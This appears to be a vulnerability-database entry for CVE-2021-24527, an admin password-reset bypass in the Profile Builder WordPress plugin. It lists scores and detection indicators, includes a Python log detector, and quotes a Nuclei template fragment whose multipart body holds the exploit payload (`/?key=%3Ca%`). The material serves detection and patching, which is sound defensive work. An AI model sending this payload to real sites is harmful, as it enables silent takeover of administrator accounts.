CVE-2021-24527
Published 2021-08-16
Priority: P1 (81) · Critical · 9.8 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 7.70% (93.8th percentile)
The User Registration & User Profile – Profile Builder WordPress plugin before 3.4.9 has a bug allowing any user to reset the password of the admin of the blog, and gain unauthorised access, due to a bypass in the way the reset key is checked. Furthermore, the admin will not be notified of such change by email for example.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cozmoslabs | profile_builder | < 3.4.9 | 3.4.9 |
Detection & IOCs (extracted from sources)
URL indicator: `/?key=%3Ca%`
- The exploit sends a multipart form POST with a `password_recovery_nonce_field2` field and a malformed `key` parameter (URL-encoded `<a`) carried in the `_wp_http_referer` field, triggering an unauthorized admin password reset.
- Successful exploitation returns HTTP 200 with the string 'Your password has been successfully changed' in the response body; use the combination of status and string as a detection signal in WAF/proxy logs.
- The PoC uses the multipart boundary `------WebKitFormBoundary8nxJ9mBo6lwGYE0K`; that exact boundary in POST requests to password-recovery endpoints indicates a replayed PoC, but an attacker can change the boundary freely, so do not rely on it alone.
- The bypass abuses the reset-key validation in Profile Builder (WordPress plugin) versions before 3.4.9; monitor POST requests to password-recovery endpoints that carry `password_recovery_nonce_field2` together with a `key` value that is not a well-formed reset key.
- `skip-variables-check: true` in the PoC template tells Nuclei not to fail on the undeclared `{{nonce}}` variable; the nonce is resolved at runtime, so a static replay of the request without a valid nonce will not succeed.
- The admin is not notified of the password change by email, so the takeover leaves no trace in standard notification channels; detection has to rely on request/response logs and on auditing admin password changes.
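Detection logic for the indicators above, as an added example; it is not code from the original page, from Wordfence, or from the Profile Builder plugin. It takes the field name, PoC boundary and success string from the page, and assumes a simple request/response record layout and a site-specific recovery-page path (`/password-recovery/`); the log records are constructed for the example. A reset key counts as well-formed only when it looks like the 20-character alphanumeric key WordPress issues via `wp_generate_password(20, false)`, so a legitimate reset is not flagged even though its success response carries the same string.

```python
"""Flag CVE-2021-24527 exploitation in proxy/WAF request logs.

Added example: not code from the page, Wordfence or Profile Builder.
Indicators (field name, PoC boundary, success string) are taken from the
page; the record layout, path and sample records are constructed here.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import parse_qs, urlparse

NONCE_FIELD = "password_recovery_nonce_field2"
EXPLOIT_BOUNDARY = "------WebKitFormBoundary8nxJ9mBo6lwGYE0K"
SUCCESS_STRING = "Your password has been successfully changed"
# WordPress issues reset keys with wp_generate_password(20, false):
# 20 alphanumeric characters. Anything else in `key` is malformed.
VALID_KEY = re.compile(r"^[A-Za-z0-9]{20}$")
# Value line of the multipart part named _wp_http_referer.
REFERER_PART = re.compile(r'name="_wp_http_referer"\r?\n\r?\n([^\r\n]*)')


@dataclass
class HttpRecord:
    """One request/response pair as a WAF or proxy might export it (assumed layout)."""
    method: str
    path: str
    content_type: str
    body: str
    status: int
    response_body: str


@dataclass
class Finding:
    verdict: str  # "none", "exploit_attempt" or "exploit_success"
    reasons: List[str] = field(default_factory=list)


def referer_key(body: str) -> Optional[str]:
    """Return the decoded `key` query parameter inside _wp_http_referer, if any."""
    m = REFERER_PART.search(body)
    if not m:
        return None
    params = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
    return params["key"][0] if "key" in params else None


def classify(rec: HttpRecord) -> Finding:
    """Apply the page's indicators to one record."""
    f = Finding("none")
    if rec.method != "POST" or "multipart/form-data" not in rec.content_type:
        return f
    if NONCE_FIELD not in rec.body:
        return f
    f.reasons.append(f"multipart POST carrying {NONCE_FIELD}")
    key = referer_key(rec.body)
    if key is None or VALID_KEY.match(key):
        return f  # no reset key, or a well-formed one: a legitimate reset flow
    f.verdict = "exploit_attempt"
    f.reasons.append(f"malformed reset key in _wp_http_referer: {key!r}")
    if EXPLOIT_BOUNDARY in rec.body:
        f.reasons.append("PoC multipart boundary present")
    if rec.status == 200 and SUCCESS_STRING in rec.response_body:
        f.verdict = "exploit_success"
        f.reasons.append("response confirms the password change")
    return f


def multipart(boundary: str, fields: dict) -> str:
    """Build a multipart/form-data body (used only to construct sample records)."""
    parts = [f'{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
             for name, value in fields.items()]
    return "".join(parts) + boundary + "--\r\n"


RECOVERY_PATH = "/password-recovery/"  # assumed; the real page is site-specific
MP = "multipart/form-data; boundary="
SAMPLE_LOG = [  # constructed records, not captured traffic
    # 1. PoC replay that succeeded: malformed key, PoC boundary, success text.
    HttpRecord("POST", RECOVERY_PATH, MP + EXPLOIT_BOUNDARY[2:],
               multipart(EXPLOIT_BOUNDARY, {NONCE_FIELD: "9f1c2e7a4b",
                                            "_wp_http_referer": "/?key=%3Ca%"}),
               200, f"<p>{SUCCESS_STRING}</p>"),
    # 2. Legitimate reset: well-formed 20-char key, same success text.
    HttpRecord("POST", RECOVERY_PATH, MP + "--geckoformboundary7d1",
               multipart("----geckoformboundary7d1",
                         {NONCE_FIELD: "3a7b1c9d2e",
                          "_wp_http_referer": "/?key=Xk3pQ9zT2mLr8vB5nW0c&login=alice"}),
               200, f"<p>{SUCCESS_STRING}</p>"),
    # 3. Attempt with a custom boundary that the WAF rejected.
    HttpRecord("POST", RECOVERY_PATH, MP + "--customb0undary",
               multipart("----customb0undary",
                         {NONCE_FIELD: "3a7b1c9d2e", "_wp_http_referer": "/?key=%3Ca%"}),
               403, "Forbidden"),
    # 4. Someone just loading the recovery form.
    HttpRecord("GET", RECOVERY_PATH, "", "", 200, "<form>...</form>"),
]


def scan(records: List[HttpRecord]) -> List[str]:
    """Verdict per record, in order."""
    return [classify(r).verdict for r in records]


if __name__ == "__main__":
    for i, rec in enumerate(SAMPLE_LOG, 1):
        fnd = classify(rec)
        print(f"{i}: {fnd.verdict:16} {'; '.join(fnd.reasons)}")
```

The verdict is driven by the malformed key, not by the boundary or the success string on their own: the boundary is trivially changed by an attacker, and the success string also appears on every legitimate reset, so either alone would produce noise. Adapt `HttpRecord` construction to whatever your proxy or WAF actually exports.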
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | n/a | 9.8 | CRITICAL | n/a |
GHSA
GHSA-cjhq-3qxp-7658: The User Registration & User Profile – Profile Builder WordPress plugin before 3
ghsa_unreviewed · 2022-05-24 · CVE-2021-24527 · CRITICAL · CWE-287
VulnCheck
cozmoslabs profile_builder Improper Authentication
vulncheck · 2021 · CVSS 9.8 · CVE-2021-24527 · CRITICAL
Affected: cozmoslabs profile_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder/profile-builder-348-admin-access-via-password-reset; https://app.crowdsec.net/cti/cve-explorer/CVE-2021-24527
No detection rules found.
Nuclei
Profile Builder < 3.4.9 - Improper Authentication
nuclei · CVSS 9.8 · CVE-2021-24527 · CRITICAL
Profile Builder

Template fragment as indexed (the request body, matchers and extractors; the template's `id`, `info` and request header are not shown):

```yaml
      ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
      Content-Disposition: form-data; name="password_recovery_nonce_field2"

      {{nonce}}
      ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
      Content-Disposition: form-data; name="_wp_http_referer"

      /?key=%3Ca%
      ------WebKitFormBoundary8nxJ9mBo6lwGYE0K--

    skip-variables-check: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Your password has been successfully changed")'
        condition: and
    extractors:
      - type: dsl
        dsl:
          - pass
# digest: 4a0a00473045022100a918d9cf2358ca3649fc90c28036ea4238c99814a4f1fd26d9e9c046adaa1bbd02206ea12c558c84b59b3efbc8eccb67ec6976869a7287e7a2715ad2800a4ecf3e65:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.